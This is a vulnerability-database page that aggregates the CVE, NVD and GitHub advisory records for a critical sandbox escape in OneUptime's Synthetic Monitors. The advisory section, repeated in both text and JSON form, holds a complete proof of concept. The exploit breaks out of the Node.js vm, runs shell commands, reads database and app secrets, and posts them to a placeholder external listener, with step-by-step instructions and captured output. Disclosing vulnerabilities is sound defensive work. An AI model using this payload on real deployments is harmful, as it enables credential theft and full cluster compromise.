CVE-2026-30887 (GCVE-0-2026-30887)
Vulnerability from cvelistv5 – Published: 2026-03-09 22:40 – Updated: 2026-03-10 14:00
VLAI
Title
OneUptime Affected by Unsandboxed Code Execution in Probe Allows Any Project Member to Achieve RCE
Summary
OneUptime is a solution for monitoring and managing online services. Prior to 10.0.18, OneUptime allows project members to run custom Playwright/JavaScript code via Synthetic Monitors to test websites. However, the system executes this untrusted user code inside the insecure Node.js vm module. By leveraging a standard prototype-chain escape (this.constructor.constructor), an attacker can bypass the sandbox, gain access to the underlying Node.js process object, and execute arbitrary system commands (RCE) on the oneuptime-probe container. Furthermore, because the probe holds database/cluster credentials in its environment variables, this directly leads to a complete cluster compromise. This vulnerability is fixed in 10.0.18.
Severity
10 (Critical)
SSVC
Exploitation: poc
Automatable: no
Technical Impact: total
CISA Coordinator (v2.0.3)
CWE
- CWE-94 - Improper Control of Generation of Code ('Code Injection')
Assigner
References
1 reference
| URL | Tags |
|---|---|
| https://github.com/OneUptime/oneuptime/security/a… | x_refsource_CONFIRM |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-30887",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-03-10T14:00:41.087768Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-03-10T14:00:44.197Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/OneUptime/oneuptime/security/advisories/GHSA-h343-gg57-2q67"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "oneuptime",
"vendor": "OneUptime",
"versions": [
{
"status": "affected",
"version": "\u003c 10.0.18"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "OneUptime is a solution for monitoring and managing online services. Prior to 10.0.18, OneUptime allows project members to run custom Playwright/JavaScript code via Synthetic Monitors to test websites. However, the system executes this untrusted user code inside the insecure Node.js vm module. By leveraging a standard prototype-chain escape (this.constructor.constructor), an attacker can bypass the sandbox, gain access to the underlying Node.js process object, and execute arbitrary system commands (RCE) on the oneuptime-probe container. Furthermore, because the probe holds database/cluster credentials in its environment variables, this directly leads to a complete cluster compromise. This vulnerability is fixed in 10.0.18."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 10,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-94",
"description": "CWE-94: Improper Control of Generation of Code (\u0027Code Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-03-09T22:40:04.425Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/OneUptime/oneuptime/security/advisories/GHSA-h343-gg57-2q67",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/OneUptime/oneuptime/security/advisories/GHSA-h343-gg57-2q67"
}
],
"source": {
"advisory": "GHSA-h343-gg57-2q67",
"discovery": "UNKNOWN"
},
"title": "OneUptime Affected by Unsandboxed Code Execution in Probe Allows Any Project Member to Achieve RCE"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-30887",
"datePublished": "2026-03-09T22:40:04.425Z",
"dateReserved": "2026-03-06T00:04:56.700Z",
"dateUpdated": "2026-03-10T14:00:44.197Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2026-30887",
"date": "2026-06-28",
"epss": "0.00387",
"percentile": "0.3058"
},
"nvd": "{\"cve\":{\"id\":\"CVE-2026-30887\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-03-10T17:40:14.887\",\"lastModified\":\"2026-06-17T10:33:05.737\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"OneUptime is a solution for monitoring and managing online services. Prior to 10.0.18, OneUptime allows project members to run custom Playwright/JavaScript code via Synthetic Monitors to test websites. However, the system executes this untrusted user code inside the insecure Node.js vm module. By leveraging a standard prototype-chain escape (this.constructor.constructor), an attacker can bypass the sandbox, gain access to the underlying Node.js process object, and execute arbitrary system commands (RCE) on the oneuptime-probe container. Furthermore, because the probe holds database/cluster credentials in its environment variables, this directly leads to a complete cluster compromise. This vulnerability is fixed in 10.0.18.\"},{\"lang\":\"es\",\"value\":\"OneUptime es una soluci\u00f3n para monitorear y gestionar servicios en l\u00ednea. Antes de la versi\u00f3n 10.0.18, OneUptime permite a los miembros del proyecto ejecutar c\u00f3digo Playwright/JavaScript personalizado a trav\u00e9s de Monitores Sint\u00e9ticos para probar sitios web. Sin embargo, el sistema ejecuta este c\u00f3digo de usuario no confiable dentro del m\u00f3dulo vm inseguro de Node.js. Al aprovechar un escape est\u00e1ndar de la cadena de prototipos (this.constructor.constructor), un atacante puede eludir la sandbox, obtener acceso al objeto de proceso subyacente de Node.js y ejecutar comandos de sistema arbitrarios (RCE) en el contenedor oneuptime-probe. Adem\u00e1s, debido a que la sonda guarda las credenciales de la base de datos/cl\u00faster en sus variables de entorno, esto conduce directamente a un compromiso completo del cl\u00faster. Esta vulnerabilidad est\u00e1 corregida en la versi\u00f3n 10.0.18.\"}],\"affected\":[{\"source\":\"security-advisories@github.com\",\"affectedData\":[{\"vendor\":\"OneUptime\",\"product\":\"oneuptime\",\"versions\":[{\"version\":\"\u003c 10.0.18\",\"status\":\"affected\"}]}]}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\",\"baseScore\":9.9,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.1,\"impactScore\":6.0}],\"ssvcV203\":[{\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"ssvcData\":{\"timestamp\":\"2026-03-10T14:00:41.087768Z\",\"id\":\"CVE-2026-30887\",\"options\":[{\"exploitation\":\"poc\"},{\"automatable\":\"no\"},{\"technicalImpact\":\"total\"}],\"role\":\"CISA Coordinator\",\"version\":\"2.0.3\"}}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-94\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:hackerbay:oneuptime:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"10.0.18\",\"matchCriteriaId\":\"CBDE45D3-FDDB-49A9-8065-4A95B2BBDEEF\"}]}]}],\"references\":[{\"url\":\"https://github.com/OneUptime/oneuptime/security/advisories/GHSA-h343-gg57-2q67\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/OneUptime/oneuptime/security/advisories/GHSA-h343-gg57-2q67\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-30887\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-03-10T14:00:41.087768Z\"}}}], \"references\": [{\"url\": \"https://github.com/OneUptime/oneuptime/security/advisories/GHSA-h343-gg57-2q67\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-03-10T14:00:32.517Z\"}}], \"cna\": {\"title\": \"OneUptime Affected by Unsandboxed Code Execution in Probe Allows Any Project Member to Achieve RCE\", \"source\": {\"advisory\": \"GHSA-h343-gg57-2q67\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"CHANGED\", \"version\": \"3.1\", \"baseScore\": 10, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"CRITICAL\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"OneUptime\", \"product\": \"oneuptime\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 10.0.18\"}]}], \"references\": [{\"url\": \"https://github.com/OneUptime/oneuptime/security/advisories/GHSA-h343-gg57-2q67\", \"name\": \"https://github.com/OneUptime/oneuptime/security/advisories/GHSA-h343-gg57-2q67\", \"tags\": [\"x_refsource_CONFIRM\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"OneUptime is a solution for monitoring and managing online services. Prior to 10.0.18, OneUptime allows project members to run custom Playwright/JavaScript code via Synthetic Monitors to test websites. However, the system executes this untrusted user code inside the insecure Node.js vm module. By leveraging a standard prototype-chain escape (this.constructor.constructor), an attacker can bypass the sandbox, gain access to the underlying Node.js process object, and execute arbitrary system commands (RCE) on the oneuptime-probe container. Furthermore, because the probe holds database/cluster credentials in its environment variables, this directly leads to a complete cluster compromise. This vulnerability is fixed in 10.0.18.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-94\", \"description\": \"CWE-94: Improper Control of Generation of Code (\u0027Code Injection\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-03-09T22:40:04.425Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2026-30887\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-03-10T14:00:44.197Z\", \"dateReserved\": \"2026-03-06T00:04:56.700Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-03-09T22:40:04.425Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
FKIE_CVE-2026-30887
Vulnerability from fkie_nvd - Published: 2026-03-10 17:40 - Updated: 2026-06-17 10:33
Severity
Summary
OneUptime is a solution for monitoring and managing online services. Prior to 10.0.18, OneUptime allows project members to run custom Playwright/JavaScript code via Synthetic Monitors to test websites. However, the system executes this untrusted user code inside the insecure Node.js vm module. By leveraging a standard prototype-chain escape (this.constructor.constructor), an attacker can bypass the sandbox, gain access to the underlying Node.js process object, and execute arbitrary system commands (RCE) on the oneuptime-probe container. Furthermore, because the probe holds database/cluster credentials in its environment variables, this directly leads to a complete cluster compromise. This vulnerability is fixed in 10.0.18.
References
| URL | Tags | ||
|---|---|---|---|
| security-advisories@github.com | https://github.com/OneUptime/oneuptime/security/advisories/GHSA-h343-gg57-2q67 | Exploit, Vendor Advisory | |
| 134c704f-9b21-4f2e-91b3-4a467353bcc0 | https://github.com/OneUptime/oneuptime/security/advisories/GHSA-h343-gg57-2q67 | Exploit, Vendor Advisory |
{
"affected": [
{
"affectedData": [
{
"product": "oneuptime",
"vendor": "OneUptime",
"versions": [
{
"status": "affected",
"version": "\u003c 10.0.18"
}
]
}
],
"source": "security-advisories@github.com"
}
],
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:hackerbay:oneuptime:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CBDE45D3-FDDB-49A9-8065-4A95B2BBDEEF",
"versionEndExcluding": "10.0.18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "OneUptime is a solution for monitoring and managing online services. Prior to 10.0.18, OneUptime allows project members to run custom Playwright/JavaScript code via Synthetic Monitors to test websites. However, the system executes this untrusted user code inside the insecure Node.js vm module. By leveraging a standard prototype-chain escape (this.constructor.constructor), an attacker can bypass the sandbox, gain access to the underlying Node.js process object, and execute arbitrary system commands (RCE) on the oneuptime-probe container. Furthermore, because the probe holds database/cluster credentials in its environment variables, this directly leads to a complete cluster compromise. This vulnerability is fixed in 10.0.18."
},
{
"lang": "es",
"value": "OneUptime es una soluci\u00f3n para monitorear y gestionar servicios en l\u00ednea. Antes de la versi\u00f3n 10.0.18, OneUptime permite a los miembros del proyecto ejecutar c\u00f3digo Playwright/JavaScript personalizado a trav\u00e9s de Monitores Sint\u00e9ticos para probar sitios web. Sin embargo, el sistema ejecuta este c\u00f3digo de usuario no confiable dentro del m\u00f3dulo vm inseguro de Node.js. Al aprovechar un escape est\u00e1ndar de la cadena de prototipos (this.constructor.constructor), un atacante puede eludir la sandbox, obtener acceso al objeto de proceso subyacente de Node.js y ejecutar comandos de sistema arbitrarios (RCE) en el contenedor oneuptime-probe. Adem\u00e1s, debido a que la sonda guarda las credenciales de la base de datos/cl\u00faster en sus variables de entorno, esto conduce directamente a un compromiso completo del cl\u00faster. Esta vulnerabilidad est\u00e1 corregida en la versi\u00f3n 10.0.18."
}
],
"id": "CVE-2026-30887",
"lastModified": "2026-06-17T10:33:05.737",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.9,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.1,
"impactScore": 6.0,
"source": "security-advisories@github.com",
"type": "Secondary"
}
],
"ssvcV203": [
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"ssvcData": {
"id": "CVE-2026-30887",
"options": [
{
"exploitation": "poc"
},
{
"automatable": "no"
},
{
"technicalImpact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-03-10T14:00:41.087768Z",
"version": "2.0.3"
}
}
]
},
"published": "2026-03-10T17:40:14.887",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/OneUptime/oneuptime/security/advisories/GHSA-h343-gg57-2q67"
},
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/OneUptime/oneuptime/security/advisories/GHSA-h343-gg57-2q67"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-94"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
GHSA-H343-GG57-2Q67
Vulnerability from github – Published: 2026-03-07 02:30 – Updated: 2026-03-10 18:44
VLAI
Summary
OneUpTime's Unsandboxed Code Execution in Probe Allows Any Project Member to Achieve RCE
Details
Summary
OneUptime allows project members to run custom Playwright/JavaScript code via Synthetic Monitors to test websites. However, the system executes this untrusted user code inside the insecure Node.js vm module. By leveraging a standard prototype-chain escape (this.constructor.constructor), an attacker can bypass the sandbox, gain access to the underlying Node.js process object, and execute arbitrary system commands (RCE) on the oneuptime-probe container. Furthermore, because the probe holds database/cluster credentials in its environment variables, this directly leads to a complete cluster compromise.
Details
The root cause of the vulnerability exists in Common/Server/Utils/VM/VMRunner.ts where user-supplied JavaScript is executed using vm.runInContext():
const vmPromise = vm.runInContext(script, sandbox, { ... });
The Node.js documentation explicitly warns that the vm module is not a security boundary and should never be used to run untrusted code.
When a user creates a Synthetic Monitor, the code inputted into the Playwright script editor is passed directly to this backend function without any AST filtering or secure isolation (e.g., isolated-vm or a dedicated restricted container).
An attacker can use the payload const proc = this.constructor.constructor('return process')(); to step out of the sandbox context and grab the host's native process object. From there, they can require child_process to execute arbitrary shell commands.
Since the oneuptime-probe service runs with access to sensitive environment variables (such as ONEUPTIME_SECRET, DATABASE_PASSWORD, etc.), an attacker can trivially exfiltrate these secrets to an external server.
PoC
This exploit can be triggered entirely through the OneUptime web dashboard GUI by any user with at least "Project Member" permissions.
- Log In: Authenticate to the OneUptime Dashboard. (Open registration is enabled by default).
- Navigate: Go to Monitors > Create New Monitor.
- Monitor Type: Select Synthetic Monitor.
- Browser/Screen Settings: Ensure Chromium is selected for "Browser Types" and Desktop is selected for "Screen Size Types".
- Payload Injection: Scroll down to the "Playwright Code" editor. Delete the default template and paste the following malicious JavaScript payload:
return new Promise((resolve) => {
try {
// 1. Traverse the prototype chain to grab the host's process object
const proc = this.constructor.constructor('return process')();
// 2. Load the host's child_process module & run a system command
const cp = proc.mainModule.require('child_process');
const output = cp.execSync('ls -la /usr/src/app').toString();
// 3. (Optional) Read sensitive environment secrets
const secret = proc.env.ONEUPTIME_SECRET;
const db_pass = proc.env.DATABASE_PASSWORD;
// 4. Exfiltrate the data via the native `http` module
const http_real = proc.mainModule.require('http');
const req = http_real.request({
hostname: 'YOUR_OAST_OR_BURP_COLLABORATOR_URL_HERE',
port: 80,
path: '/',
method: 'POST'
}, (res) => {
resolve("EXFILTRATION_STATUS: " + res.statusCode);
});
req.on('error', (e) => resolve("EXFILTRATION_ERROR: " + e.message));
const payloadData = JSON.stringify({ rce_output: output, secret: secret, db: db_pass });
req.write(payloadData);
req.end();
} catch(e) {
resolve("CRITICAL_ERROR: " + e.message);
}
});
- Save & Execute: Click Save. Within 60 seconds, the probe worker will pick up the monitor, execute the code, and send the RCE output to your external listener URL.
OUTPUT:
{"rce_output":"total 296\ndrwxr-xr-x 1 root root 4096 Mar 3 18:27 .\ndrwxr-xr-x 1 root root 4096 Mar 3 18:26 ..\n-rw-r--r-- 1 root root 16 Mar 3 18:24 .gitattributes\n-rwxr-xr-x 1 root root 403 Mar 3 18:24 .gitignore\ndrwxr-xr-x 2 root root 4096 Mar 3 18:24 API\n-rw-r--r-- 1 root root 4103 Mar 3 18:24 Config.ts\n-rw-r--r-- 1 root root 2602 Mar 3 18:24 Dockerfile\n-rw-r--r-- 1 root root 2705 Mar 3 18:24 Dockerfile.tpl\n-rw-r--r-- 1 root root 2935 Mar 3 18:24 Index.ts\ndrwxr-xr-x 3 root root 4096 Mar 3 18:24 Jobs\ndrwxr-xr-x 2 root root 4096 Mar 3 18:24 Services\ndrwxr-xr-x 4 root root 4096 Mar 3 18:24 Tests\ndrwxr-xr-x 3 root root 4096 Mar 3 18:24 Utils\ndrwxr-xr-x 3 root root 4096 Mar 3 18:27 build\n-rw-r--r-- 1 root root 889 Mar 3 18:24 jest.config.json\ndrwxr-xr-x 297 root root 12288 Mar 3 18:26 node_modules\n-rw-r--r-- 1 root root 353 Mar 3 18:24 nodemon.json\n-rw-r--r-- 1 root root 203119 Mar 3 18:24 package-lock.json\n-rw-r--r-- 1 root root 1481 Mar 3 18:24 package.json\n-rw-r--r-- 1 root root 11514 Mar 3 18:24 tsconfig.json\n"}
Impact
What kind of vulnerability is it? Remote Code Execution (RCE) / Code Injection / Sandbox Escape.
Who is impacted? Any OneUptime deployment running version <= 10.0.0. Since open registration is enabled by default, an external, unauthenticated attacker can create an account, create a project, and instantly compromise the entire cluster.
Severity
9.9 (Critical)
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "@oneuptime/common"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "10.0.18"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-30887"
],
"database_specific": {
"cwe_ids": [
"CWE-94"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-07T02:30:09Z",
"nvd_published_at": "2026-03-10T17:40:14Z",
"severity": "CRITICAL"
},
"details": "### Summary\nOneUptime allows project members to run custom Playwright/JavaScript code via Synthetic Monitors to test websites. However, the system executes this untrusted user code inside the insecure Node.js `vm` module. By leveraging a standard prototype-chain escape (`this.constructor.constructor`), an attacker can bypass the sandbox, gain access to the underlying Node.js `process` object, and execute arbitrary system commands (RCE) on the `oneuptime-probe` container. Furthermore, because the probe holds database/cluster credentials in its environment variables, this directly leads to a complete cluster compromise.\n\n### Details\nThe root cause of the vulnerability exists in [Common/Server/Utils/VM/VMRunner.ts](oneuptime/Common/Server/Utils/VM/VMRunner.ts) where user-supplied JavaScript is executed using `vm.runInContext()`:\n\n```typescript\nconst vmPromise = vm.runInContext(script, sandbox, { ... });\n```\n\nThe Node.js documentation explicitly warns that the `vm` module is not a security boundary and should never be used to run untrusted code. \n\nWhen a user creates a **Synthetic Monitor**, the code inputted into the Playwright script editor is passed directly to this backend function without any AST filtering or secure isolation (e.g., `isolated-vm` or a dedicated restricted container). \n\nAn attacker can use the payload `const proc = this.constructor.constructor(\u0027return process\u0027)();` to step out of the sandbox context and grab the host\u0027s native `process` object. From there, they can require `child_process` to execute arbitrary shell commands. \n\nSince the `oneuptime-probe` service runs with access to sensitive environment variables (such as `ONEUPTIME_SECRET`, `DATABASE_PASSWORD`, etc.), an attacker can trivially exfiltrate these secrets to an external server.\n\n### PoC\nThis exploit can be triggered entirely through the OneUptime web dashboard GUI by any user with at least \"Project Member\" permissions.\n\n1. **Log In**: Authenticate to the OneUptime Dashboard. (Open registration is enabled by default).\n2. **Navigate**: Go to **Monitors** \u003e **Create New Monitor**.\n3. **Monitor Type**: Select **Synthetic Monitor**.\n4. **Browser/Screen Settings**: Ensure **Chromium** is selected for \"Browser Types\" and **Desktop** is selected for \"Screen Size Types\".\n5. **Payload Injection**: Scroll down to the \"Playwright Code\" editor. Delete the default template and paste the following malicious JavaScript payload:\n\n```javascript\nreturn new Promise((resolve) =\u003e {\n try {\n // 1. Traverse the prototype chain to grab the host\u0027s process object\n const proc = this.constructor.constructor(\u0027return process\u0027)();\n \n // 2. Load the host\u0027s child_process module \u0026 run a system command\n const cp = proc.mainModule.require(\u0027child_process\u0027);\n const output = cp.execSync(\u0027ls -la /usr/src/app\u0027).toString();\n \n // 3. (Optional) Read sensitive environment secrets\n const secret = proc.env.ONEUPTIME_SECRET;\n const db_pass = proc.env.DATABASE_PASSWORD;\n \n // 4. Exfiltrate the data via the native `http` module\n const http_real = proc.mainModule.require(\u0027http\u0027);\n const req = http_real.request({ \n hostname: \u0027YOUR_OAST_OR_BURP_COLLABORATOR_URL_HERE\u0027, \n port: 80, \n path: \u0027/\u0027, \n method: \u0027POST\u0027 \n }, (res) =\u003e {\n resolve(\"EXFILTRATION_STATUS: \" + res.statusCode);\n });\n \n req.on(\u0027error\u0027, (e) =\u003e resolve(\"EXFILTRATION_ERROR: \" + e.message));\n \n const payloadData = JSON.stringify({ rce_output: output, secret: secret, db: db_pass });\n req.write(payloadData);\n req.end();\n } catch(e) {\n resolve(\"CRITICAL_ERROR: \" + e.message);\n }\n});\n```\n\n6. **Save \u0026 Execute**: Click **Save**. Within 60 seconds, the probe worker will pick up the monitor, execute the code, and send the RCE output to your external listener URL.\n\nOUTPUT:\n```\n{\"rce_output\":\"total 296\\ndrwxr-xr-x 1 root root 4096 Mar 3 18:27 .\\ndrwxr-xr-x 1 root root 4096 Mar 3 18:26 ..\\n-rw-r--r-- 1 root root 16 Mar 3 18:24 .gitattributes\\n-rwxr-xr-x 1 root root 403 Mar 3 18:24 .gitignore\\ndrwxr-xr-x 2 root root 4096 Mar 3 18:24 API\\n-rw-r--r-- 1 root root 4103 Mar 3 18:24 Config.ts\\n-rw-r--r-- 1 root root 2602 Mar 3 18:24 Dockerfile\\n-rw-r--r-- 1 root root 2705 Mar 3 18:24 Dockerfile.tpl\\n-rw-r--r-- 1 root root 2935 Mar 3 18:24 Index.ts\\ndrwxr-xr-x 3 root root 4096 Mar 3 18:24 Jobs\\ndrwxr-xr-x 2 root root 4096 Mar 3 18:24 Services\\ndrwxr-xr-x 4 root root 4096 Mar 3 18:24 Tests\\ndrwxr-xr-x 3 root root 4096 Mar 3 18:24 Utils\\ndrwxr-xr-x 3 root root 4096 Mar 3 18:27 build\\n-rw-r--r-- 1 root root 889 Mar 3 18:24 jest.config.json\\ndrwxr-xr-x 297 root root 12288 Mar 3 18:26 node_modules\\n-rw-r--r-- 1 root root 353 Mar 3 18:24 nodemon.json\\n-rw-r--r-- 1 root root 203119 Mar 3 18:24 package-lock.json\\n-rw-r--r-- 1 root root 1481 Mar 3 18:24 package.json\\n-rw-r--r-- 1 root root 11514 Mar 3 18:24 tsconfig.json\\n\"}\n\n```\n\u003cimg width=\"1364\" height=\"470\" alt=\"image\" src=\"https://github.com/user-attachments/assets/9e0d3013-bba5-4188-8777-6903c8f55dba\" /\u003e\n\n\n### Impact\n**What kind of vulnerability is it?** \nRemote Code Execution (RCE) / Code Injection / Sandbox Escape.\n\n**Who is impacted?** \nAny OneUptime deployment running version \u003c= 10.0.0. Since open registration is enabled by default, an external, unauthenticated attacker can create an account, create a project, and instantly compromise the entire cluster.\n\n---",
"id": "GHSA-h343-gg57-2q67",
"modified": "2026-03-10T18:44:03Z",
"published": "2026-03-07T02:30:09Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/OneUptime/oneuptime/security/advisories/GHSA-h343-gg57-2q67"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30887"
},
{
"type": "PACKAGE",
"url": "https://github.com/OneUptime/oneuptime"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "OneUpTime\u0027s Unsandboxed Code Execution in Probe Allows Any Project Member to Achieve RCE"
}
Loading…
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…